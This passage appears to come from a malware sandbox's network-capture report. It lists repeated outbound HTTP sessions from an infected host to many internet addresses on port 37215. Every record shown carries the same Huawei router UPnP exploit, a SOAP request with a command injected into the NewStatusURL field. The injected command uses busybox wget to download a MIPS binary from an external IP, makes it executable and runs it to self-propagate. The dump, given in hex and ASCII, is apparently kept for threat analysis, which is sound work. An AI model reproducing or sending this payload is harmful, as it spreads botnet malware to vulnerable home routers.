                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1392192.168.2.233450241.89.17.2637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.341317892 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1393192.168.2.2339600197.43.90.1037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.341342926 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1394192.168.2.235799641.53.183.22737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.341351032 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1395192.168.2.234505842.236.202.12637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.341382027 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1396192.168.2.234303643.91.22.1237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.341403008 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1397192.168.2.2360592197.182.6.13437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.469697952 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1398192.168.2.2355710218.110.35.9837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.469705105 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1399192.168.2.2351280141.143.18.4237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.470602989 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1400192.168.2.235359468.109.232.12937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.470679998 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1401192.168.2.233572041.44.101.23437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.470731020 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
